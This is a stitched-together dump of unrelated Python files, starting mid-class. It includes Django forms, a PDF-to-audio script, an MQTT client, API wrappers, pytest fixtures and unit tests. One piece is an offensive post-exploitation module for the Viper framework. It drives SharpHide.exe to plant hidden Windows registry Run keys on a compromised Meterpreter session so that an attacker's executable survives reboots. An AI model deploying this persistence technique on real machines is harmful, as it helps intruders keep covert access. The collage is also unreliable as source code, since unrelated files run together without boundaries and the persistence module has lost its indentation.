        fields = ('pupil', 'term')
class PaymentForm(forms.ModelForm):
    class Meta:
        model = Payment
        fields = ('pupil', 'amount', 'datepaid', 'mode')
class PickPeriodForm(forms.Form):
    # Date-range picker; both bounds default to "now".
    start = forms.DateField(widget=SelectDateWidget(years=SELECTYEARS), initial=timezone.now)
    end = forms.DateField(widget=SelectDateWidget(years=SELECTYEARS), initial=timezone.now)
class PickTermForm(forms.Form):
    """Select a school term and year."""
    term = forms.CharField(max_length=10, required=True, widget=forms.Select(choices=TERMS))
    # Fix: bound the year by the shared SELECTYEARS range instead of the
    # hard-coded 2015..2020, matching the other Pick* forms in this module.
    year = forms.IntegerField(min_value=SELECTYEARS[0], max_value=SELECTYEARS[len(SELECTYEARS)-1], initial=getCurrentYear)
class PickMonthYearForm(forms.Form):
    """Pick a month (by lowercase name) and a bounded year."""
    # Build (value, label) pairs for the 12 real months; month_name[0] is ''.
    MONTHS = tuple(
        (calendar.month_name[i].lower(), calendar.month_name[i].title())
        for i in range(1, 13)
    )
    # Fix: the choice *values* are lowercase month names, but the old initial
    # (getCurrentMonth) was the month *number*, so it never matched an option.
    month = forms.CharField(max_length=15, required=True,
                            widget=forms.Select(choices=MONTHS),
                            initial=lambda: calendar.month_name[timezone.now().month].lower())
    year = forms.IntegerField(min_value=SELECTYEARS[0], max_value=SELECTYEARS[len(SELECTYEARS)-1], initial=getCurrentYear)
class PickSummaryForm(forms.Form):
    # Summary selector: report type (parent/estate) plus term and year.
    sumtype = forms.CharField(max_length=10, required=True, widget=forms.Select(choices=TYPE))
    term = forms.CharField(max_length=10, required=True, widget=forms.Select(choices=TERMS))
    year = forms.IntegerField(min_value=SELECTYEARS[0], max_value=SELECTYEARS[len(SELECTYEARS)-1], initial=getCurrentYear)
class PickPupilForm(forms.Form):
    # Single-pupil selector backed by the import-time PUPILS choices.
    pupils = forms.CharField(max_length=100, required=True, widget=forms.Select(choices=PUPILS))
class PickParentForm(forms.Form):
    # Single-parent selector backed by the import-time PARENTS choices.
    parent = forms.CharField(max_length=100, required=True, widget=forms.Select(choices=PARENTS))
import pyttsx3
import pandas as pd
import openpyxl # 需有此才能順利開啟xlsx
import tkinter as tk
import PyPDF2
# 也可用pdfplumber
import os
import boto3 # AWS SDK for Python (Boto3)
# ---------------------------------- Constants ---------------------------------- #
# Markers delimiting the article body inside the Breaking News PDF layout.
KEY_WORDS = "Many online quizzes at URL below\n "
KEY_END_WORDS = "\n Sources"
# AWS credentials pulled from the environment.
ID = os.environ.get("AWS_ID")
KEY = os.environ.get("AWS_ACCESS_KEY")
# ---------------------------------- Class ---------------------------------- #
# Create a Reading Breaking News class
class ReadBreakingNews(PyPDF2.PdfFileReader):
    """PDF reader that extracts title, date and body text from a Breaking
    News lesson PDF (layout-dependent string slicing)."""
    def __init__(self, f):
        # NOTE(review): PdfFileReader and its warndest/overwriteWarnings
        # arguments are from the legacy PyPDF2 1.x API — confirm the pin.
        super().__init__(stream=f, strict=True, warndest=None, overwriteWarnings=True)
        self.origin = self.read_all()
        self.title, self.published_date, self.content = self.find_paragraph(start=KEY_WORDS, end=KEY_END_WORDS)
        self.news = self.published_date + "\n" + self.title + "\n" + self.content
    def read_all(self):
        """Return the extracted text of every page as a list of strings."""
        text = []
        for page in range(self.numPages):
            text.append(self.getPage(page).extractText())
        return text
    def find_paragraph(self, start=None, end=None):
        """
        :param start: Put the key words which appear right before the title.
        :param end: Put the key words which appear right after the content.
        Usually, it won't be changed unless the website changes the basic form.
        :return: title, published_date, content
        """
        # Find the start keyword in the layout and take its index; the first
        # following "\n " (which precedes the date) ends the title span.
        # The date and content spans are carved out the same way below.
        title_start_from = self.origin[0].find(start)  # return index
        title_start_from = title_start_from + len(start)
        title_end_from = self.origin[0][title_start_from:].find("\n ")
        title_end_from = title_start_from + title_end_from
        title = self.origin[0][title_start_from:title_end_from]
        title = title.replace("\n", "")
        date_start_from = self.origin[0][title_end_from:].find("\n ")
        date_start_from = title_end_from + date_start_from
        # +8 accounts for matching "\n, 2021" (year suffix) instead of "\n ".
        date_end_from = self.origin[0][title_end_from:].find("\n, ") + 8
        date_end_from = date_start_from + date_end_from
        published_date = self.origin[0][date_start_from:date_end_from]
        published_date = published_date.replace("\n", "").lstrip()
        content_end_from = self.origin[0].find(end)
        content = self.origin[0][date_end_from:content_end_from].lstrip()
        content = content.replace("\n", "")
        content = content.replace('\"', '')
        return title, published_date, content
# ---------------------------------- UI setting -Main Window ---------------------------------- #
# ---------------------------------- Preliminary - Tackle PDF ---------------------------------- #
# Read pdf by PyPDF2
file = open("example.pdf", "rb")
pdf = ReadBreakingNews(file)
news = pdf.news
print(news)  # keep this: lets you eyeball the extracted text and spot layout changes
# ---------------------------------- Convert PDF to Audio ---------------------------------- #
# Method 1: Offline - convert the PDF text to audio with pyttsx3
# engine = pyttsx3.init()
# voices = engine.getProperty("voices")  # list available voices
# rate = engine.getProperty("rate")
# engine.setProperty("voice", voices[2].id)  # pick a voice
# engine.setProperty("rate", 130)  # speech speed; default is 200 wpm
# engine.say(news)  # queue the article text
# engine.save_to_file(news, "python_example_audio.mp3")  # save the audio
# engine.runAndWait()  # run (must come last)
# Method 2: Online - Use AWS and boto3 to create the audio
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/polly.html?highlight=polly#Polly.Client.synthesize_speech
polly_client = boto3.Session(
    aws_access_key_id=ID,
    aws_secret_access_key=KEY,
    region_name='us-west-2').client('polly')  # 'polly' is AWS's text-to-speech (TTS) service
response = polly_client.synthesize_speech(VoiceId='Joanna',
                                          OutputFormat='mp3',
                                          LanguageCode='en-US',
                                          Text=news,
                                          Engine='neural')
file = open('polly_example_audio.mp3', 'wb')  # create the output mp3 file
file.write(response['AudioStream'].read())
file.close()
|
"""
UConnMQTT module
This module implements the MQTT connection and messaging through the Mosquitto broker
"""
import logging
from . import exceptions, config
import paho.mqtt.client as mqtt
import time
class UConnMQTT(object):
    """
    MQTT class

    Wraps a paho-mqtt client configured from ``config.Config``; keeps a single
    subscription and a user-supplied message callback, reconnecting on loss.
    """
    def __init__(self):
        """
        Initialize MQTT connection
        """
        self.__topic = None
        self.__message_callback = None
        self.reconnection = 0
        self.__config = config.Config()
        try:
            self.__reconnect_time = int(self.__config.messaging_reconnect_time)
        except (TypeError, ValueError):
            # Fallback retry budget when the config value is absent/invalid.
            self.__reconnect_time = 60
        # Get connection parameters
        username, password, host = self.__get_connection_parameters()
        # Establish connection
        self.__establish_connection(username, password, host)
    @staticmethod
    def __log_exception(ex):
        """
        Exception handler
        :param ex: Raised exception
        :raise: UtimConnectionException, UtimUnknownException
        """
        etype = type(ex)
        if etype == ValueError and \
                (str(ex) == 'Invalid host.' or str(ex) == 'Invalid credentials.'):
            logging.exception("Connection error " + str(ex))
            raise exceptions.UtimConnectionException
        else:
            logging.error('Unknown error ' + str(ex))
            raise exceptions.UtimUnknownException
    def __get_connection_parameters(self):
        """
        Function to get parameters for Mosquitto broker from config.py
        :return: Triplet of username, password and host address
        :rtype: str, str, str
        """
        return self.__config.messaging_username, self.__config.messaging_password, self.__config.messaging_hostname
    def __establish_connection(self, username, password, hostname):
        """
        Connect to the broker, retrying on network errors until the budget runs out.
        :param str username: User name
        :param str password: User password
        :param str hostname: Host name
        :return: Opened channel
        :raise: UtimConnectionException
        """
        self.connectionFlag = False
        while True:
            try:
                if username is None or password is None:
                    raise ValueError('Invalid credentials.')
                if hostname is None:
                    raise ValueError('Invalid host.')
                # Parameters and credentials
                self.__client = mqtt.Client()
                self.__client.on_connect = self.on_connect
                self.__client.on_disconnect = self.on_disconnect
                self.__client.username_pw_set(username, password)
                self.__client.on_message = self._on_message
                self.__client.connect(hostname)
                self.__client.loop_start()
                break
            except ValueError as er:
                self.__log_exception(er)
            except OSError as er:
                time.sleep(1)
                if self.reconnection == 0:
                    # NOTE(review): print() does not interpolate '%s'; this line
                    # prints the literal placeholder followed by the value.
                    # Probably meant %-formatting (logging-style args below are fine).
                    print('ucon-mqtt - Attempt to reconnect within %s seconds', self.__reconnect_time)
                    logging.error(er)
                    logging.error('Attempt to reconnect within %s seconds', self.__reconnect_time)
                self.reconnection += 1
                print("RECONNECTION TIMES: {0}".format(self.reconnection))
                time.sleep(1)
                # NOTE(review): compares the *seconds* budget against the retry
                # *count*; works only because each iteration sleeps ~2s — confirm intent.
                if self.__reconnect_time <= self.reconnection:
                    print('ucon-mqtt - Reconnection timeout !')
                    logging.error('Reconnection timeout !')
                    raise exceptions.UtimConnectionException(er)
    def on_connect(self, client, userdata, flags, rc):
        # paho callback: broker accepted the connection; reset retry counter
        # and re-subscribe if a topic was active before a reconnect.
        print("ucon-mqtt - Internet connection established..")
        logging.debug("Internet connection established..")
        self.reconnection = 0
        self.connectionFlag = True
        if self.__topic:
            self.__client.subscribe(self.__topic)
    def on_disconnect(self, client, userdata, rc):
        # paho callback: connection lost; count the attempt and reconnect.
        print("ucon-mqtt - Internet connection losted..")
        logging.debug("Internet connection losted..")
        self.connectionFlag = False
        if rc != mqtt.MQTT_ERR_SUCCESS:
            self.reconnection += 1
            print("RECONNECTION TIMES: {0}".format(self.reconnection))
            self.__client.loop_stop(force=True)
            if self.__reconnect_time <= self.reconnection:
                print('ucon-mqtt - Reconnection timeout !')
                logging.error('Reconnection timeout !')
                raise exceptions.UtimConnectionException()
            # Get connection parameters
            username, password, host = self.__get_connection_parameters()
            # Establish connection
            self.__establish_connection(username, password, host)
    def disconnect(self):
        """
        Disconnect from broker
        """
        self.__client.disconnect()
        self.__client.loop_stop(force=True)
    def subscribe(self, topic, cbobj, callback):
        """
        Subscribe
        :param str topic: Channel name to listen
        :param cbobj: Object passed back as first argument of the callback
        :param callback: Callback
        """
        self.__topic = topic
        self.__cbobject = cbobj
        self.__message_callback = callback
        self.__client.subscribe(topic)
    def unsubscribe(self, topic):
        """
        Unsubscribe
        :param str topic: Channel name to listen
        """
        self.__topic = None
        self.__cbobject = None
        self.__message_callback = None
        self.__client.unsubscribe(topic)
    def publish(self, sender, destination, message):
        """
        Publish
        :param str sender: Message sender (bytes)
        :param str destination: Message destination (non empty string)
        :param str message: The message to send (bytes)
        """
        try:
            if (not isinstance(destination, str) or not destination or
                    not isinstance(message, bytes) or
                    not isinstance(sender, bytes)):
                raise exceptions.UtimExchangeException
            # Wire format: b"<sender> <message>" — parsed back in _on_message.
            msg = sender + b' ' + message
            logging.info("UMQTT PUBLISH MESSAGE: {0}".format(msg))
            self.__client.publish(topic=destination, payload=msg)
        except exceptions.UtimExchangeException as ex:
            self.__log_exception(ex)
    def _on_message(self, client, userdata, message):
        """
        On message callback
        :param mqtt.Client client: mqtt.Client instance
        :param userdata: private user data as set in Client() or userdata_set()
        :param message: instance of MQTTMessage
        :returns: 0 - if custom message callback was called, 1 - if custom message callback is None,
        None - else
        """
        # Split the payload back into (sender, message) on the first space.
        msg = message.payload
        m = msg.partition(b' ')
        if callable(self.__message_callback):
            self.__message_callback(self.__cbobject, m[0], m[2])
            return 0
        return 1
|
#!/usr/bin/env python3
# Read whitespace-separated integers from stdin: first is n, the rest form a.
n, *a = map(int, open(0))
# -(-n // m) is ceil(n / m) via negated floor division; print ceil(n/min(a)) + 4.
print(-(-n // min(a)) + 4)
from __future__ import absolute_import
from django.apps import AppConfig
class Config(AppConfig):
    # Django app config for sentry's Java language integration.
    name = "sentry.lang.java"
    def ready(self):
        # Imported lazily so plugin registration happens only once Django
        # has finished loading all apps.
        from .plugin import JavaPlugin
        from sentry.plugins import register
        register(JavaPlugin)
|
# -*- coding: utf-8 -*-
# @File : SimpleRewMsfModule.py
# @Date : 2019/1/11
# @Desc :
from Lib.ModuleAPI import *
class PostModule(PostMSFCSharpModule):
NAME_ZH = "Windows注册表Run键值持久化(C#)"
DESC_ZH = "模块通过调用SharpHide.exe写入隐藏的注册表键值,实现持久化.\n" \
"SharpHide.exe会将目标exe路径写入到注册表Run键值中.\n"
NAME_EN = "Windows registry Run key persistence (C#)"
DESC_EN = "The module realizes persistence by calling Sharphide.exe to write hidden registry keys.\n" \
"SharpHide.exe will write the target exe path into the registry Run key.\n"
MODULETYPE = TAG2TYPE.Persistence
PLATFORM = ["Windows"] # 平台
PERMISSIONS = ["User", "Administrator", "SYSTEM", ] # 所需权限
ATTCK = ["T1037"] # ATTCK向量
README = ["https://www.yuque.com/vipersec/module/npl2d8"]
REFERENCES = ["https://github.com/outflanknl/SharpHide"]
AUTHOR = ["Viper"]
OPTIONS = register_options([
OptionEnum(name='action',
tag_zh="执行动作",
desc_zh="针对键值的执行的命令",
tag_en="Action", desc_en="Action",
required=True,
enum_list=[
{'tag_zh': "创建", 'tag_en': "Create", 'value': "create"},
{'tag_zh': "删除", 'tag_en': "Delete", 'value': "delete"},
],
length=6),
OptionStr(name='keyvalue',
tag_zh="可执行文件目录",
desc_zh="输入开启启动的exe文件路径.",
tag_en="Exe file directory", desc_en="Enter the path of the exe file to start.",
required=True,
length=18),
OptionStr(name='arguments',
tag_zh="命令行参数", required=False,
desc_zh="执行exe是的命令行参数",
tag_en="Command line parameters", desc_en="Command line parameters for executing exe",
length=24),
])
def __init__(self, sessionid, ipaddress, custom_param):
super().__init__(sessionid, ipaddress, custom_param)
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_windows is not True:
return False, "此模块只支持Windows的Meterpreter", "This module only supports Meterpreter for Windows"
self.set_assembly("SharpHide")
if self.param("action") == "delete":
self.set_arguments("action=delete")
else:
param_keyvalue = self.param("keyvalue")
arguments = f"action=create keyvalue='{param_keyvalue}'"
param_arguments = self.param("arguments")
if param_arguments is not None:
arguments += f" arguments='{param_arguments}'"
self.set_arguments(arguments)
return True, None
def callback(self, status, message, data):
assembly_out = self.get_console_output(status, message, data)
self.log_raw(assembly_out)
|
'''
Created on 17.07.2011
@author: kca
'''
import logging, sys
from futile.logging import get_logger
from subprocess import check_output as _check_output, check_call as _check_call, CalledProcessError, STDOUT, Popen
try:
    # Fix: the module name was misspelled "subprocces", so this import always
    # raised ImportError and the stdlib classes were never used. On Python
    # 3.3+ the real subprocess.SubprocessError/TimeoutExpired are now picked up.
    from subprocess import SubprocessError, TimeoutExpired
except ImportError:
    # Fallback stand-ins for interpreters without these classes (Python 2).
    class SubprocessError(Exception):
        pass
    class TimeoutExpired(SubprocessError):
        pass
def _pre_call(args):
    """Log the command about to run and return it joined as a single string."""
    #needed for chroot safety
    # NOTE(review): encodings.string_escape exists only on Python 2; this
    # import fails on Python 3 — confirm the target interpreter.
    import encodings.string_escape
    cmd = ' '.join(args)
    get_logger().debug("running %s" % (cmd, ))
    return cmd
def check_output(args, stdin=None, stderr=STDOUT, shell=False, cwd=None, env=None, *popenargs, **popenkw):
    """Run *args* and return its output, logging command and failures."""
    cmd = _pre_call(args)
    try:
        return _check_output(args, stdin=stdin, stderr=stderr, shell=shell,
                             cwd=cwd, env=env, *popenargs, **popenkw)
    except CalledProcessError as err:
        get_logger().debug(
            "Command %s returned exit code %s. This is the programs output:\n%s<<EOF>>"
            % (cmd, err.returncode, err.output))
        raise
def check_call(args, stdin=None, stdout=None, stderr=None, shell=False, cwd=None, env=None, *popenargs, **popenkw):
    """Run *args*, logging the exit code if the command fails."""
    cmd = _pre_call(args)
    try:
        return _check_call(args, stdin=stdin, stdout=stdout, stderr=stderr,
                           shell=shell, cwd=cwd, env=env, *popenargs, **popenkw)
    except CalledProcessError as err:
        get_logger().debug("Command %s returned exit code %s." % (cmd, err.returncode))
        raise
|
"""Support testing with Pytest."""
import pytest
import os
import logging
from asgi_tools.tests import manage_lifespan
from . import TestClient
def pytest_addoption(parser):
    """Register ini settings and CLI flags for locating a Muffin app."""
    parser.addini('muffin_app', 'Set path to muffin application')
    parser.addoption(
        '--muffin-app', dest='muffin_app', help='Set to muffin application')
    parser.addini('muffin_config', 'Set module path to muffin configuration')
    parser.addoption(
        '--muffin-config', dest='muffin_config',
        help='Set module path to muffin configuration')
def pytest_load_initial_conftests(early_config, parser, args):
    """Prepare to load the Muffin application before conftests run."""
    from muffin import CONFIG_ENV_VARIABLE

    known = parser.parse_known_args(args)

    # Export the configuration module path so the application picks it up.
    config_path = known.muffin_config or early_config.getini('muffin_config')
    if config_path:
        os.environ[CONFIG_ENV_VARIABLE] = config_path

    # Remember the application import path for the ``app`` fixture.
    early_config.app = known.muffin_app or early_config.getini('muffin_app')
@pytest.fixture(scope='session')
async def app(pytestconfig, request, aiolib):
    """Load an application, run lifespan events, prepare plugins.

    Yields the imported Muffin application, or returns early (yielding
    nothing) when no application path was configured.
    """
    if not pytestconfig.app:
        logging.warning(
            'Improperly configured. Please set ``muffin_app`` in your pytest config. '
            'Or use ``--muffin-app`` command option.')
        return

    from muffin.utils import import_app

    app = import_app(pytestconfig.app)
    msg = f"Setup application '{app.cfg.name}'"
    if app.cfg.config:
        # Bug fix: the original appended "with config" without a leading
        # space, producing e.g. "…'app'with config 'cfg'".
        msg += f" with config '{app.cfg.config}'"
    app.logger.info(msg)

    async with manage_lifespan(app):
        # Setup plugins that expose a conftest hook.
        for plugin in app.plugins.values():
            if hasattr(plugin, 'conftest') and plugin.conftest is not None:
                app.logger.info(f"Setup plugin '{plugin.name}'")
                await plugin.conftest()
        yield app
@pytest.fixture
def client(app):
    """Build and return a test client bound to the ``app`` fixture."""
    test_client = TestClient(app)
    return test_client
|
import re
import functools
from collections import OrderedDict
from functools import partialmethod as pm
from typing import Optional
from lxml import etree
from zeep import Client, Plugin
from zeep.exceptions import Fault
from zeep.helpers import serialize_object
from . import utils
class TRTH:
    """A Pythonic wrapper for the TRTH API based on Zeep."""
    # The API version is baked into the WSDL URL below.
    TRTH_VERSION = '5.8'
    TRTH_WSDL_URL = f'https://trth-api.thomsonreuters.com/TRTHApi-{TRTH_VERSION}/wsdl/TRTHApi.wsdl'
    def __init__(self, config=None):
        """Load configuration, build the SOAP client and authenticate.

        :param config: value forwarded to ``utils.load_config`` (None lets
            the util choose its default source).
        """
        self.config = utils.load_config(config)
        self.logger = utils.make_logger('pytrthree', self.config)
        # Behavioral switches; ``__getattr__`` exposes them as attributes.
        self.options = dict(debug=False, target_cls=dict, raise_exception=False,
                            input_parser=True, output_parser=True)
        self.plugin = DebugPlugin(self)
        self.client = Client(self.TRTH_WSDL_URL, strict=True, plugins=[self.plugin])
        self.factory = self.client.type_factory('ns0')
        self.signatures = self._parse_signatures()
        self._make_docstring()
        # Authenticates once and installs the token as a default SOAP header.
        self.client.set_default_soapheaders(self._make_header())
        self.logger.info('TRTH API initialized.')
    def __getattr__(self, item):
        # Only runs after normal attribute lookup fails, so the __dict__
        # probe is effectively a re-check; unknown names fall through to the
        # options dict (raising KeyError when absent there too).
        try:
            return self.__dict__[item]
        except KeyError:
            return self.options[item]
    def _parse_signatures(self):
        """Parses API function signatures from the WSDL document.

        :return: dict mapping operation name -> (input_sig, output_sig).
        """
        signatures = {}
        for service in self.client.wsdl.services.values():
            for port in service.ports.values():
                for op in port.binding._operations.values():
                    # Strip "{namespace}" prefixes and the outer "name(...)"
                    # wrapper, leaving only the parameter list text.
                    input_sig = re.sub("{[^}]*}", '', op.input.body.signature())
                    output_sig = re.sub("{[^}]*}", '', op.output.body.signature())
                    input_sig = re.sub('\w+\(|\)', '', input_sig)
                    output_sig = re.sub('\w+\(|\)', '', output_sig)
                    signatures[op.name] = (input_sig, output_sig)
        return signatures
    def _make_docstring(self):
        """Dynamically generates docstrings for API function partials."""
        def formatter(func_name):
            # Builds (signature-printer, docstring) for one API function.
            indent = ' ' * 8 + '\n'
            input_sig, output_sig = self.signatures[func_name]
            output_sig = re.sub('\w+: ', '', output_sig) if output_sig else None
            signature = f'{indent}{func_name}({input_sig}) --> {output_sig}'
            reference = ('See TRTH API User Guide for further documentation: '
                         'https://tickhistory.thomsonreuters.com/\n')
            params = indent.join([':param {}'.format(i) for i in input_sig.split(', ') if i])
            ret = f'{indent}:return: {output_sig}'
            docstring = '\n'.join([signature, reference, params, ret])
            docstring = re.sub(r'\n\s*\n', '\n', docstring)
            return lambda: print(signature.strip()), docstring
        # NOTE(review): the class attributes are partialmethod objects; this
        # isinstance check relies on attribute access (getattr) yielding a
        # functools.partial-compatible object — confirm against the
        # functools.partialmethod __get__ behavior of the targeted Python.
        for attr in dir(self):
            obj = getattr(self, attr)
            if isinstance(obj, functools.partial):
                new_obj = functools.update_wrapper(obj, self._wrap)
                func = obj.keywords['function']
                new_obj.signature, new_obj.__doc__ = formatter(func)
                setattr(self, attr, new_obj)
    def _make_header(self):
        """
        Does initial authentication with the TRTH API
        and generates unique token used in subsequent API requests.

        :return: SOAP header dict carrying the authenticated CredentialsHeader.
        """
        self.logger.info('Making credentials.')
        credentials = self.factory.CredentialsHeader(tokenId='', **self.config['credentials'])
        header = {'CredentialsHeader': credentials}
        # Dummy request to get tokenId
        response = self.client.service.GetVersion(_soapheaders=header)
        header = {'CredentialsHeader': response.header.CredentialsHeader}
        self.logger.info(f'Username: {response.header.CredentialsHeader.username}')
        self.logger.info(f'Token ID: {response.header.CredentialsHeader.tokenId}')
        return header
    def _wrap(self, *args, function=None, **kwargs) -> Optional[dict]:
        """
        Wrapper for TRTH API functions.

        :param function: Wrapped TRTH API function string name
        :param args: API function arguments
        :param kwargs: API function arguments
        :return: parsed response, or None when a Fault is swallowed
            (``raise_exception`` option disabled).
        """
        if function is None:
            raise ValueError('API function not specified')
        if self.debug:
            print(self.signatures[function])
        input_type, output_type = self.signatures[function]
        params = self._parse_params(args, kwargs, input_type)
        try:
            f = getattr(self.client.service, function)
            resp = f(**params)
            return self._parse_response(resp, output_type)
        except Fault as fault:
            if self.raise_exception:
                raise fault
            else:
                self.logger.error(fault)
    def _parse_params(self, args, kwargs, input_type):
        """
        Uses util parser functions so that the user doesn't have to manually instantiate
        `self.factory` classes. Also provides reasonable default values for some types.
        Can be disabled by editing `self.options`.

        :param args: API function arguments passed by the user
        :param kwargs: API function arguments passed by the user
        :param input_type: API function input signature
        :return: Parsed/filled function input parameter dictionary
        """
        # Parsing args and kwargs into an OrderedDict of name -> [type, value]
        params = re.findall('(\w+): (\w*:?\w+)', input_type)
        params = OrderedDict([(name, [typ, None]) for name, typ in params])
        for name, value in zip(params, args):
            params[name][1] = value
        for name, value in kwargs.items():
            params[name][1] = value
        # Calling parser functions for each data type; types without a
        # matching utils.make_<type> helper are passed through unchanged.
        if self.input_parser:
            for name, (typ, value) in params.items():
                try:
                    parser = getattr(utils, f'make_{typ}')
                    params[name][1] = parser(value, self.factory)
                except AttributeError:
                    pass
        return {k: v[1] for k, v in params.items()}
    def _parse_response(self, resp, output_type):
        """
        Uses util parser functions in order to return response in a
        less verbose and more user-friendly format.
        Can be disabled/customized by editing `self.options`.

        :param resp: Zeep response object
        :param output_type: API function output signature
        :return: Parsed dictionary/DataFrame response
        """
        output_type = output_type.split(': ')[-1]
        if self.target_cls is None:
            return resp
        else:
            resp = serialize_object(resp.body, target_cls=self.target_cls)
        # Calling parser functions for data type; falls back to the raw
        # serialized object when no utils.parse_<type> helper exists.
        if self.output_parser:
            try:
                parser = getattr(utils, f'parse_{output_type}')
                resp = parser(resp)
            except AttributeError:
                pass
        return resp
    # Quota and permissions
    get_look_back_period = pm(_wrap, function='GetLookBackPeriod')
    get_quota = pm(_wrap, function='GetQuota')
    get_ric_list = pm(_wrap, function='GetRICList')
    get_used_instruments = pm(_wrap, function='GetUsedInstruments')
    # Instrument details
    expand_chain = pm(_wrap, function='ExpandChain')
    get_ric_symbology = pm(_wrap, function='GetRICSymbology')
    search_rics = pm(_wrap, function='SearchRICs')
    verify_rics = pm(_wrap, function='VerifyRICs')
    # Request instrument data directly
    submit_request = pm(_wrap, function='SubmitRequest')
    clean_up = pm(_wrap, function='CleanUp')
    # Request instrument data using HTTP/FTP
    set_ftp_details = pm(_wrap, function='SetFTPDetails')
    test_ftp = pm(_wrap, function='TestFTP')
    submit_ftp_request = pm(_wrap, function='SubmitFTPRequest')
    # Retrieving requested data
    get_status = pm(_wrap, function='GetInflightStatus')
    cancel_request = pm(_wrap, function='CancelRequest')
    get_request_result = pm(_wrap, function='GetRequestResult')
    # Speed Guide
    get_page = pm(_wrap, function='GetPage')
    get_snapshot_info = pm(_wrap, function='GetSnapshotInfo')
    search_page = pm(_wrap, function='SearchPage')
    # Data dictionary
    get_asset_domains = pm(_wrap, function='GetAssetDomains')
    get_bond_types = pm(_wrap, function='GetBondTypes')
    get_countries = pm(_wrap, function='GetCountries')
    get_credit_ratings = pm(_wrap, function='GetCreditRatings')
    get_currencies = pm(_wrap, function='GetCurrencies')
    get_exchanges = pm(_wrap, function='GetExchanges')
    get_option_expiry_months = pm(_wrap, function='GetOptionExpiryMonths')
    get_futures_delivery_months = pm(_wrap, function='GetFuturesDeliveryMonths')
    get_instrument_types = pm(_wrap, function='GetInstrumentTypes')
    get_restricted_pes = pm(_wrap, function='GetRestrictedPEs')
    get_message_types = pm(_wrap, function='GetMessageTypes')
    get_version = pm(_wrap, function='GetVersion')
class DebugPlugin(Plugin):
    """Zeep plugin that dumps SOAP traffic when the parent API is in debug mode."""

    def __init__(self, parent):
        self.parent = parent

    def _dump(self, envelope, http_headers, operation):
        # Shared printer for both traffic directions.
        print(operation)
        print(http_headers)
        print(etree.tostring(envelope, pretty_print=True).decode('utf-8'))

    def egress(self, envelope, http_headers, operation, binding_options):
        if self.parent.debug:
            self._dump(envelope, http_headers, operation)
        return envelope, http_headers

    def ingress(self, envelope, http_headers, operation):
        if self.parent.debug:
            self._dump(envelope, http_headers, operation)
        return envelope, http_headers
|
# standard libraries
import logging
import unittest
# local libraries
from nion.utils import Converter
class TestConverter(unittest.TestCase):
    """Tests for FloatToScaledIntegerConverter with a negative minimum."""

    def setUp(self) -> None:
        pass

    def tearDown(self) -> None:
        pass

    def test_float_to_scaled_integer_with_negative_min(self) -> None:
        conv = Converter.FloatToScaledIntegerConverter(1000, -100, 100)
        # Forward conversion maps [-100, 100] onto [0, 1000].
        for value, expected in ((0, 500), (-100, 0), (100, 1000)):
            self.assertAlmostEqual(conv.convert(value) or 0, expected)
        # Round-tripping recovers the original value.
        for value in (0, -100, 100):
            self.assertAlmostEqual(conv.convert_back(conv.convert(value)) or 0.0, value)
if __name__ == '__main__':
    # Enable verbose logging when this test module is executed directly.
    logging.getLogger().setLevel(logging.DEBUG)
    unittest.main()
|
import secrets
from ..common import cloudcli_server_request, assert_only_one_server, assert_no_matching_servers, wait_command
def test_server_hdlib_only_one_server(session_server_powered_on, session_server_powered_off):
    """Exercise /server/hdlib against two matching servers via the shared helper."""
    matching_servers = [session_server_powered_on, session_server_powered_off]
    assert_only_one_server(matching_servers, "/server/hdlib")
def test_server_hdlib_no_matching_servers():
    """Exercise /server/hdlib when no server matches, via the shared helper."""
    assert_no_matching_servers("/server/hdlib")
def test_server_hdlib(temp_server):
    """Clone the first hard disk of a temporary server into the image library."""
    server_name = temp_server["name"]

    # List the hard disks available for cloning on the temp server.
    response = cloudcli_server_request("/server/hdlib", method="POST", json={
        "name": server_name
    })
    assert len(response) == 1

    # Take the uuid of the first (only) hard disk.
    disk_uuid = response[0]['uuid']
    assert len(disk_uuid) > 10

    # Power off the server before cloning.
    response = cloudcli_server_request("/service/server/poweroff", method="POST", json={
        "name": server_name
    })
    assert len(response) == 1
    wait_command(response[0])

    # Create the snapshot (clone the disk).
    response = cloudcli_server_request("/server/hdlib", method="POST", json={
        "name": server_name,
        "clone": disk_uuid,
        "image-name": "clone_of_{}".format(server_name)
    })
    wait_command(response)
|
"""from django.shortcuts import render_to_response
class GeogebraAppletForm(forms.ModelForm):
"Форма для загрузки архива""
class Meta:
model = GeogebraApplet
fields = ['archive']
def main_page(request):
# если в POST есть данные, значит это post-запрос и мы пытаемся загрузить архив
if request.POST:
# инициализируем форму с переданными данными
form = GeogebraAppletForm(request.POST, request.FILES)
# если в форме нет ошибок, сохраняем
if form.is_valid():
form.save()
else:
# get запрос, просто инициализируем форму, чтобы вывести на странице
form = GeogebraAppletForm()
# получаем все чертежи
applet_list = GeogebraApplet.objects.all()
# форму и список чертежей добавляем контекст, чтобы отрисовать в шаблоне
context = {
form: form, applet_list: applet_list
}
return render_to_response('index.html', context) """ |
"""Top-level package for Regression Enrichment Surface."""
__author__ = """Austin Clyde"""
__email__ = 'aclyde@uchicago.edu'
__version__ = '0.1.0'
|
# Load in our dependencies
from __future__ import absolute_import
import os
import subprocess
import sys
import textwrap
from unittest import TestCase
import restructuredtext_lint
# Fixture paths used throughout the tests below.
_dir = os.path.dirname(os.path.abspath(__file__))
valid_rst = os.path.join(_dir, 'test_files', 'valid.rst')
warning_rst = os.path.join(_dir, 'test_files', 'second_short_heading.rst')
dir_rst = os.path.join(_dir, 'test_files', 'dir')
invalid_rst = os.path.join(_dir, 'test_files', 'invalid.rst')
# CLI entry point, exercised via subprocess in the CLI test class.
rst_lint_path = os.path.join(_dir, os.pardir, 'cli.py')
"""
# TODO: Implement this as a class (options) with a sugar function that lints a string against a set of options
An invalid rst file
when linted with the `fail_first` parameter
raises on the first error
"""
class TestRestructuredtextLint(TestCase):
def _load_file(self, filepath):
"""Load a file into memory"""
f = open(filepath)
file = f.read()
f.close()
return file
def _lint_file(self, *args, **kwargs):
"""Lint the file and preserve any errors"""
return restructuredtext_lint.lint(*args, **kwargs)
def test_passes_valid_rst(self):
"""A valid reStructuredText file will not raise any errors"""
content = self._load_file(valid_rst)
errors = self._lint_file(content)
self.assertEqual(errors, [])
def test_raises_on_invalid_rst(self):
"""An invalid reStructuredText file when linted raises errors"""
# Load and lint invalid file
content = self._load_file(invalid_rst)
actual_errors = self._lint_file(content, invalid_rst)
# Assert errors against expected errors
self.assertEqual(len(actual_errors), 1)
self.assertEqual(actual_errors[0].line, 2)
